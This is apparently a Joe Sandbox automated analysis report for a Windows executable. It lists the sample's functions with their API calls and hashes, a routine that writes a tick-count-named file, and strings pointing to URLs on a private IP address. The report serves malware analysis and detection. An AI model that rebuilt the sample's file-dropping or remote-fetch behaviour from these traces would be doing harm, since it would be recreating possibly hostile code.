6D7CF390.MFC42(00000080,0000000E,00000080,004070E0,004070E8,004073FC,004073FC,00000066,00000000), ref: 00401B3A
LoadIconA.USER32(00000000,00000080), ref: 00401B40

Strings

nB@, xrefs: 00401A76
0?@, xrefs: 00401A8E
DB@, xrefs: 00401AF6

Memory Dump Source

Source File: 00000004.00000002.1285440476.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1285421899.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285459869.0000000000405000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285507874.0000000000406000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285526751.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285544000.0000000000408000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285571263.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_peks66Iy06.jbxd

Similarity

API ID: D800310F390IconLoad
String ID: 0?@$DB@$nB@
API String ID: 487667375-169237758
Opcode ID: 61283f7cb8a9a505548b534a433f2e0d23e54d829050f8b43b38edcd8d41ae24
Instruction ID: f2e10ca964a3f428014d6b156628cc8ca48279fbad35800b64bcb403419e067a
Opcode Fuzzy Hash: 61283f7cb8a9a505548b534a433f2e0d23e54d829050f8b43b38edcd8d41ae24
Instruction Fuzzy Hash: 80413AB1308B418BD301EF65844576EBBD1EFC9344F04486EF996272C2DBBD65098FAA

Function 00401690 Relevance: 27.1, APIs: 18, Instructions: 77
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

6D85A190.MFC42(00000000), ref: 004016B0
6D7D5BD0.MFC42 ref: 004016BA
__p___argv.MSVCRT ref: 004016BF
ExitProcess.KERNEL32 ref: 004016DE

Part of subcall function 00401220: 6D7C2DD0.MFC42(00100000), ref: 0040122F
Part of subcall function 00401220: __p___argv.MSVCRT ref: 00401253
Part of subcall function 00401220: __p___argv.MSVCRT ref: 00401274
Part of subcall function 00401220: Sleep.KERNEL32(00000064), ref: 00401286
Part of subcall function 00401220: GetTickCount.KERNEL32 ref: 004012CD
Part of subcall function 00401220: wsprintfA.USER32 ref: 004012EA
Part of subcall function 00401220: CreateFileA.KERNELBASE(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040130A
Part of subcall function 00401220: 6D7C2DD0.MFC42(00000000), ref: 00401313
Part of subcall function 00401220: Sleep.KERNELBASE(00000064), ref: 00401321
Part of subcall function 00401220: WriteFile.KERNELBASE(00000000,00000000,?,?,00000000), ref: 00401331
Part of subcall function 00401220: Sleep.KERNELBASE(00000064), ref: 00401339

Part of subcall function 004019C0: 6D800310.MFC42(00000066,00000000,?,?,?,?,?,00000000,004047CD,000000FF,004016EF,00000000), ref: 004019E7
Part of subcall function 004019C0: 6D7C7F20.MFC42(00000066,00000000), ref: 004019F9
Part of subcall function 004019C0: 6D7C7F20.MFC42(00000066,00000000), ref: 00401A11
Part of subcall function 004019C0: 6D7C7F20.MFC42(00000066,00000000), ref: 00401A29
Part of subcall function 004019C0: 6D7C7F20.MFC42(00000066,00000000), ref: 00401A41
Part of subcall function 004019C0: 6D7C7F20.MFC42(00000066,00000000), ref: 00401A59
Part of subcall function 004019C0: 6D7C7F20.MFC42(00000066,00000000), ref: 00401A71
Part of subcall function 004019C0: 6D7C7F20.MFC42(00000066,00000000), ref: 00401A89
Part of subcall function 004019C0: 6D7D56F0.MFC42(00000066,00000000), ref: 00401AA1
Part of subcall function 004019C0: 6D7D56F0.MFC42(00000066,00000000), ref: 00401AB3
Part of subcall function 004019C0: 6D7D56F0.MFC42(00000066,00000000), ref: 00401AC3
Part of subcall function 004019C0: 6D7D56F0.MFC42(00000066,00000000), ref: 00401AD5
Part of subcall function 004019C0: 6D7D56F0.MFC42(00000066,00000000), ref: 00401AE5
Part of subcall function 004019C0: 6D7D5A80.MFC42(004073FC,00000066,00000000), ref: 00401AFC
Part of subcall function 004019C0: 6D7D5A80.MFC42(004073FC,004073FC,00000066,00000000), ref: 00401B08
Part of subcall function 004019C0: 6D7D5A80.MFC42(004070E8,004073FC,004073FC,00000066,00000000), ref: 00401B14
Part of subcall function 004019C0: 6D7D5A80.MFC42(004070E0,004070E8,004073FC,004073FC,00000066,00000000), ref: 00401B24
Part of subcall function 004019C0: 6D7C50F0.MFC42(004070E0,004070E8,004073FC,004073FC,00000066,00000000), ref: 00401B29
Part of subcall function 004019C0: 6D7CF390.MFC42(00000080,0000000E,00000080,004070E0,004070E8,004073FC,004073FC,00000066,00000000), ref: 00401B3A
Part of subcall function 004019C0: LoadIconA.USER32(00000000,00000080), ref: 00401B40

6D8009F0.MFC42 ref: 00401705
6D7CA420.MFC42 ref: 0040171C
6D7CA420.MFC42 ref: 00401730
6D7CA420.MFC42 ref: 00401744
6D7CA420.MFC42 ref: 00401758
6D7CA420.MFC42 ref: 0040176C
6D7C2C80.MFC42 ref: 00401780
6D7FBC50.MFC42 ref: 00401794
6D7FBC00.MFC42 ref: 004017A8
6D7FBC00.MFC42 ref: 004017BC
6D7FBC00.MFC42 ref: 004017D0
6D7FBC00.MFC42 ref: 004017E4
6D7FBC00.MFC42 ref: 004017F5
6D8003E0.MFC42 ref: 00401809

Memory Dump Source

Source File: 00000004.00000002.1285440476.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1285421899.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285459869.0000000000405000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285507874.0000000000406000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285526751.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285544000.0000000000408000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285571263.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_peks66Iy06.jbxd

Similarity

API ID: A420$Sleep__p___argv$File$A190CountCreateD8003D800310D8009ExitF390IconLoadProcessTickWritewsprintf
String ID:
API String ID: 693048296-0
Opcode ID: c799f09f8497bed147593227bf029dd3053d6bb179ea20caa85db19ddaaaa527
Instruction ID: 616903a36303fad059cf54e446dff4fbed7c69b0abb077ef7505e4f2811fcf63
Opcode Fuzzy Hash: c799f09f8497bed147593227bf029dd3053d6bb179ea20caa85db19ddaaaa527
Instruction Fuzzy Hash: 55315D740093C19AD334FB65C65DBDFBBE0AFE5308F04096EA58D162C2DB785548CA67

Function 00402710 Relevance: 22.6, APIs: 15, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

6D8098C0.MFC42(000003EF), ref: 0040272F
6D8098C0.MFC42(000003EF,000003EF), ref: 00402745
SendMessageA.USER32(?,000000B1,00000000,000000FF), ref: 00402759
SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 00402768
6D8098C0.MFC42(000003F0), ref: 00402771
SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 00402785
SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 00402794
6D8098C0.MFC42(000003F0), ref: 004027A6
6D8098C0.MFC42(000003F0,000003F0), ref: 004027BC
SendMessageA.USER32(?,000000B1,00000000,000000FF), ref: 004027D0
SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 004027DF
6D8098C0.MFC42(000003EF), ref: 004027E8
SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 004027FC
SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 0040280B
6D800FC0.MFC42(?), ref: 00402810

Memory Dump Source

Source File: 00000004.00000002.1285440476.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1285421899.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285459869.0000000000405000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285507874.0000000000406000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285526751.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285544000.0000000000408000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285571263.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_peks66Iy06.jbxd

Similarity

API ID: MessageSend$D8098$D800
String ID:
API String ID: 38505941-0
Opcode ID: acb55e1696818d62f7613b3393379dbb035e1e1f34fcddce67767c826e64d927
Instruction ID: 43040d4cf96770573546f0ef5553b46f0ed2c3b2f342c278d2bebaaa6e181bda
Opcode Fuzzy Hash: acb55e1696818d62f7613b3393379dbb035e1e1f34fcddce67767c826e64d927
Instruction Fuzzy Hash: 6221357178031477EB14AB558CD6F7E365AABD8B10F34422ABF056F2C6CAF4E8018B55

Function 00402440 Relevance: 21.1, APIs: 14, Instructions: 98
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040246C
6D7D56F0.MFC42 ref: 00402478
6D7FBFA0.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,004048C8,000000FF), ref: 00402491
6D7CEC00.MFC42(?,?,00000020,00000001,00000000,?,?,?,?,?,?,?,?,?,?,004048C8), ref: 004024A6

Part of subcall function 00402390: 6D7CA420.MFC42(00000000,00000000,00000002,00000000,00404898,000000FF,004022B6,?), ref: 004023BE

6D7EB590.MFC42(?,00000000,00000000), ref: 004024BF
6D7C90A0.MFC42(?,?,?,?,?,?,?,?,?,?,004048C8,000000FF), ref: 004024D0
6D7CA420.MFC42(?,?,?,?,?,?,?,?,?,?,004048C8,000000FF), ref: 004024DE
6D7CEC00.MFC42(?,00000000,00000020,00000001,?,?,?,?,?,?,?,?,?,?,004048C8,000000FF), ref: 004024FA

Part of subcall function 00402390: 6D7CA420.MFC42(00000000,00000000,00000002,00000000,00404898,000000FF,004022B6,?), ref: 00402403

6D7CEC00.MFC42(?,?,00000020,00000001,?), ref: 0040251A

Part of subcall function 00402390: 6D7CA420.MFC42(00000000,00000000,00000002,00000000,00404898,000000FF,004022B6,?), ref: 00402426

6D7EB590.MFC42(?,00000001), ref: 00402532
6D7C90A0.MFC42(?,?,?,?,?,?,?,?,?,?,004048C8,000000FF), ref: 00402543
6D7CA420.MFC42(?,?,?,?,?,?,?,?,?,?,004048C8,000000FF), ref: 00402551
6D7EE820.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,004048C8,000000FF), ref: 0040255A

Part of subcall function 00402850: CoInitialize.OLE32(00000000), ref: 0040286D
Part of subcall function 00402850: 6D7CEC00.MFC42(?), ref: 004028AF
Part of subcall function 00402850: 6D7CEC00.MFC42 ref: 004028C7
Part of subcall function 00402850: CoUninitialize.OLE32 ref: 004028E3

6D7CA420.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,004048C8,000000FF), ref: 00402572

Memory Dump Source

Source File: 00000004.00000002.1285440476.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1285421899.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285459869.0000000000405000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285507874.0000000000406000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285526751.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285544000.0000000000408000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285571263.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_peks66Iy06.jbxd

Similarity

API ID: A420$B590$E820InitializeMessageSendUninitialize
String ID:
API String ID: 567275389-0
Opcode ID: 6b4598c18b149baf41dc2c699b37129104aff7cc0169a10aed1875957db3102f
Instruction ID: e12ff5c2053f9a72bd65041b051e88c030b435080f647bcd3e17c5c7067139df
Opcode Fuzzy Hash: 6b4598c18b149baf41dc2c699b37129104aff7cc0169a10aed1875957db3102f
Instruction Fuzzy Hash: EE31C8B5204341ABD305FB25D856F9FB7E4ABD8704F000A2EF595672C1DB7865088BA7

Function 004039D0 Relevance: 21.1, APIs: 14, Instructions: 96
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageA.USER32(?,00000147,00000000,00000000), ref: 004039FC
6D7D56F0.MFC42 ref: 00403A08
6D7FBFA0.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,00404BC8,000000FF), ref: 00403A1E
6D7CEC00.MFC42(?,?,00000020,00000001,00000000,?,?,?,?,?,?,?,?,?,?,00404BC8), ref: 00403A33

Part of subcall function 004038F0: 6D7CA420.MFC42(00000000,00000000,00000002,00000000,00404B98,000000FF,00403816,?), ref: 0040391E

6D7EB590.MFC42(?,00000000,00000000), ref: 00403A4C
6D7C90A0.MFC42(?,?,?,?,?,?,?,?,?,?,00404BC8,000000FF), ref: 00403A5D
6D7CA420.MFC42(?,?,?,?,?,?,?,?,?,?,00404BC8,000000FF), ref: 00403A6B
6D7CEC00.MFC42(?,00000000,00000020,00000001,?,?,?,?,?,?,?,?,?,?,00404BC8,000000FF), ref: 00403A87

Part of subcall function 004038F0: 6D7CA420.MFC42(00000000,00000000,00000002,00000000,00404B98,000000FF,00403816,?), ref: 00403963

6D7CEC00.MFC42(?,?,00000020,00000001,?), ref: 00403AA7

Part of subcall function 004038F0: 6D7CA420.MFC42(00000000,00000000,00000002,00000000,00404B98,000000FF,00403816,?), ref: 00403986

6D7EB590.MFC42(?,00000001), ref: 00403ABF
6D7C90A0.MFC42(?,?,?,?,?,?,?,?,?,?,00404BC8,000000FF), ref: 00403AD0
6D7CA420.MFC42(?,?,?,?,?,?,?,?,?,?,00404BC8,000000FF), ref: 00403ADE
6D7EE820.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,00404BC8,000000FF), ref: 00403AE7
6D7CA420.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,00404BC8,000000FF), ref: 00403AF8

Memory Dump Source

Source File: 00000004.00000002.1285440476.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1285421899.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285459869.0000000000405000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285507874.0000000000406000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285526751.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285544000.0000000000408000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285571263.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_peks66Iy06.jbxd

Similarity

API ID: A420$B590$E820MessageSend
String ID:
API String ID: 1276184048-0
Opcode ID: c4a9426b3d146f6b18e720923754d03eefbba986a6632d145798aab3bb1fd514
Instruction ID: f6de4c7b58c9e08d410c388df69f80ca665281aef36746c90f471116ae625215
Opcode Fuzzy Hash: c4a9426b3d146f6b18e720923754d03eefbba986a6632d145798aab3bb1fd514
Instruction Fuzzy Hash: A831A8B5204341AFC304EB25C856F9FB7E4ABD4714F004A2EF595662D1DB78A5088BA7

Function 00401830 Relevance: 19.6, APIs: 13, Instructions: 53COMMON

Download Yara Rule

APIs

6D7CA420.MFC42(?,?,?,0040470F,000000FF), ref: 0040185B
6D7CA420.MFC42(?,?,?,0040470F,000000FF), ref: 0040186B
6D7CA420.MFC42(?,?,?,0040470F,000000FF), ref: 0040187B
6D7CA420.MFC42(?,?,?,0040470F,000000FF), ref: 0040188B
6D7CA420.MFC42(?,?,?,0040470F,000000FF), ref: 0040189B
6D7C2C80.MFC42(?,?,?,0040470F,000000FF), ref: 004018AB
6D7FBC50.MFC42(?,?,?,0040470F,000000FF), ref: 004018BB
6D7FBC00.MFC42(?,?,?,0040470F,000000FF), ref: 004018CB
6D7FBC00.MFC42(?,?,?,0040470F,000000FF), ref: 004018DB
6D7FBC00.MFC42(?,?,?,0040470F,000000FF), ref: 004018EB
6D7FBC00.MFC42(?,?,?,0040470F,000000FF), ref: 004018FB
6D7FBC00.MFC42(?,?,?,0040470F,000000FF), ref: 00401908
6D8003E0.MFC42(?,?,?,0040470F,000000FF), ref: 00401917

Memory Dump Source

Source File: 00000004.00000002.1285440476.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1285421899.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285459869.0000000000405000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285507874.0000000000406000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285526751.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285544000.0000000000408000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285571263.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_peks66Iy06.jbxd

Similarity

API ID: A420$D8003
String ID:
API String ID: 3465068534-0
Opcode ID: 7b5ce37691534f6e46bec6ed38d29974445b5b0c433dc7e2899eb447151f42f4
Instruction ID: f9e30e69a48690507b3e4af920e781beb467eb0ec983ed3cc8e406cc6407e96c
Opcode Fuzzy Hash: 7b5ce37691534f6e46bec6ed38d29974445b5b0c433dc7e2899eb447151f42f4
Instruction Fuzzy Hash: 0F214C740087C18BD315EB74C05979BBBE4BFA9314F440E1EE5EA162C2DBB86248C6A7

Function 00401F00 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00401F23

Part of subcall function 00403F80: 6D809A60.MFC42(?,000000CB,00000002,00000009,00000000,00000000,?,00401F36), ref: 00403F92

_mbscmp.MSVCRT ref: 00401F73
6D7CA420.MFC42 ref: 00401F81
CoUninitialize.OLE32(http://192.168.100.83/,00000000,00000000,00000000,00000000), ref: 00402063

Strings

http://192.168.100.83/F.htm, xrefs: 00402007
http://192.168.100.83/, xrefs: 00401F6D, 00402057
http://192.168.100.83/9.htm, xrefs: 00402032

Memory Dump Source

Source File: 00000004.00000002.1285440476.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1285421899.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285459869.0000000000405000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285507874.0000000000406000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285526751.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285544000.0000000000408000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285571263.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_peks66Iy06.jbxd

Similarity

API ID: A420D809InitializeUninitialize_mbscmp
String ID: http://192.168.100.83/$http://192.168.100.83/9.htm$http://192.168.100.83/F.htm
API String ID: 3761695730-1795800369
Opcode ID: 35811a6e0b39e4f7b08488aa2c5a3d4eb87b184382bd88b4647af15aedf611d2
Instruction ID: a67ed12fd00eb966c7ef07626c931287be5c1ca5e9acac2baddc7c0ca8bee009
Opcode Fuzzy Hash: 35811a6e0b39e4f7b08488aa2c5a3d4eb87b184382bd88b4647af15aedf611d2
Instruction Fuzzy Hash: F061BE70604302AFD710EF64C989B1BBBA8AF88714F04496DF985EB3D1DB78D905CB96

Function 00401C60 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

6D800E90.MFC42(?,?,?,?,004047E8,000000FF), ref: 00401C7A
GetSystemMenu.USER32(?,00000000,?,?,?,?,004047E8,000000FF), ref: 00401C85
6D809290.MFC42(00000000,?,?,?,?,004047E8,000000FF), ref: 00401C8C
6D7D56F0.MFC42(00000000,?,?,?,?,004047E8,000000FF), ref: 00401C9B
6D7C95D0.MFC42(00000065,00000000,?,?,?,?,004047E8,000000FF), ref: 00401CAE
AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 00401CD2
AppendMenuA.USER32(?,00000000,00000010,?), ref: 00401CE1
6D7CA420.MFC42(00000065,00000000,?,?,?,?,004047E8,000000FF), ref: 00401CF0
SendMessageA.USER32(?,00000080,00000001,?), ref: 00401D0D
SendMessageA.USER32(?,00000080,00000000,?), ref: 00401D21

Strings

http://www.1.com, xrefs: 00401D31

Memory Dump Source

Source File: 00000004.00000002.1285440476.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1285421899.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285459869.0000000000405000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285507874.0000000000406000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285526751.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285544000.0000000000408000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285571263.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_peks66Iy06.jbxd

Similarity

API ID: Menu$AppendMessageSend$A420D800D809290System
String ID: http://www.1.com
API String ID: 3615546937-1471656216
Opcode ID: 8bfcf3e66f0112f36f00dce6af1070b3536336381e515d163b94ad252a9c805a
Instruction ID: 014e3ba470a9a3624742ceba51641722d59a2d0febe7554dbc01a11c7d6f2640
Opcode Fuzzy Hash: 8bfcf3e66f0112f36f00dce6af1070b3536336381e515d163b94ad252a9c805a
Instruction Fuzzy Hash: 142192B53447017BE220EB65CC86F5BB3A8FB88B50F10462DB6556B2D1CBB9F800CB59

Function 00403500 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 59COMMON

Download Yara Rule

APIs

6D800310.MFC42(00000082,?,?,?,?,00000000,?,00404B39,000000FF,004025B6,00000000), ref: 00403529
6D7C7F20.MFC42(00000082,?), ref: 0040353B
6D7C7F20.MFC42(00000082,?), ref: 00403553
6D7C7F20.MFC42(00000082,?), ref: 0040356B
6D7C7F20.MFC42(00000082,?), ref: 00403583
6D7D56F0.MFC42(00000082,?), ref: 0040359B
6D7D56F0.MFC42(00000082,?), ref: 004035AD
6D7D5A80.MFC42(004073FC,00000082,?), ref: 004035C4
6D7D5A80.MFC42(004073FC,004073FC,00000082,?), ref: 004035D0

Strings

nB@, xrefs: 00403540
DB@, xrefs: 004035BE

Memory Dump Source

Source File: 00000004.00000002.1285440476.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1285421899.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285459869.0000000000405000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285507874.0000000000406000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285526751.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285544000.0000000000408000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285571263.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_peks66Iy06.jbxd

Similarity

API ID: D800310
String ID: DB@$nB@
API String ID: 1386358564-4005678958
Opcode ID: d9b166e6bfa9c663b61ce0e3a603041949639b1d5f481a09527389042575c698
Instruction ID: 07a67f05f5cb526cde5bb56a1f38001e8bee0c3f8aa25bc8e26a66cad1eb58db
Opcode Fuzzy Hash: d9b166e6bfa9c663b61ce0e3a603041949639b1d5f481a09527389042575c698
Instruction Fuzzy Hash: 092118B1348B818BD301EF25844176FBBE1EBD5784F14486EF681273C2CBBD65098B9A

Function 004043EC Relevance: 16.6, APIs: 11, Instructions: 111COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 00404419
__p__fmode.MSVCRT ref: 0040442E
__p__commode.MSVCRT ref: 0040443C
__setusermatherr.MSVCRT ref: 00404468
_initterm.MSVCRT ref: 0040447E
__getmainargs.MSVCRT ref: 004044A1
_initterm.MSVCRT ref: 004044B1
GetStartupInfoA.KERNEL32(?), ref: 004044F0
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00404514
exit.MSVCRT ref: 00404524
_XcptFilter.MSVCRT ref: 00404536

Memory Dump Source

Source File: 00000004.00000002.1285440476.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1285421899.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285459869.0000000000405000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285507874.0000000000406000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285526751.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285544000.0000000000408000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285571263.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_peks66Iy06.jbxd

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID:
API String ID: 801014965-0
Opcode ID: 41c4c4fb87addf5f86e7c459d09dd59d2deec0db5ee8492f51d93a0d0e41125f
Instruction ID: b84817577bdd794c3584b55ee7e6e144752272faa3ca625d9eeea178d453bb24
Opcode Fuzzy Hash: 41c4c4fb87addf5f86e7c459d09dd59d2deec0db5ee8492f51d93a0d0e41125f
Instruction Fuzzy Hash: BB416AB1C04748AFDB20DFA4DD45A6A7BB8EB49714B20027EE651B72E1D7385840CF69

Function 00402590 Relevance: 12.0, APIs: 8, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00403500: 6D800310.MFC42(00000082,?,?,?,?,00000000,?,00404B39,000000FF,004025B6,00000000), ref: 00403529
Part of subcall function 00403500: 6D7C7F20.MFC42(00000082,?), ref: 0040353B
Part of subcall function 00403500: 6D7C7F20.MFC42(00000082,?), ref: 00403553
Part of subcall function 00403500: 6D7C7F20.MFC42(00000082,?), ref: 0040356B
Part of subcall function 00403500: 6D7C7F20.MFC42(00000082,?), ref: 00403583
Part of subcall function 00403500: 6D7D56F0.MFC42(00000082,?), ref: 0040359B
Part of subcall function 00403500: 6D7D56F0.MFC42(00000082,?), ref: 004035AD
Part of subcall function 00403500: 6D7D5A80.MFC42(004073FC,00000082,?), ref: 004035C4
Part of subcall function 00403500: 6D7D5A80.MFC42(004073FC,004073FC,00000082,?), ref: 004035D0

6D8009F0.MFC42 ref: 004025C5
6D7CA420.MFC42 ref: 004025DC
6D7CA420.MFC42 ref: 004025F0
6D7FBC00.MFC42 ref: 00402604
6D7FBC00.MFC42 ref: 00402618
6D7FBC00.MFC42 ref: 0040262C
6D7FBC50.MFC42 ref: 0040263D
6D8003E0.MFC42 ref: 00402651

Memory Dump Source

Source File: 00000004.00000002.1285440476.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1285421899.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285459869.0000000000405000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285507874.0000000000406000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285526751.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285544000.0000000000408000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285571263.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_peks66Iy06.jbxd

Similarity

API ID: A420$D8003D800310D8009
String ID:
API String ID: 1126660788-0
Opcode ID: e526fec369c35d35e31d161f3d6166b5031a0c0aa420842dfd615be23e30ada1
Instruction ID: 42c3b9d168d0418a94f95c23e9adf838e90ef7772fbddf989849af9f639a5948
Opcode Fuzzy Hash: e526fec369c35d35e31d161f3d6166b5031a0c0aa420842dfd615be23e30ada1
Instruction Fuzzy Hash: A611067400C3C0DAD336EB60C459BDBBBB4BBE9314F800A2DA59D162C19F781149CA57

Function 00402670 Relevance: 10.5, APIs: 7, Instructions: 35COMMON

Download Yara Rule

APIs

6D7CA420.MFC42(?,?,?,0040498B,000000FF), ref: 0040269B
6D7CA420.MFC42(?,?,?,0040498B,000000FF), ref: 004026AB
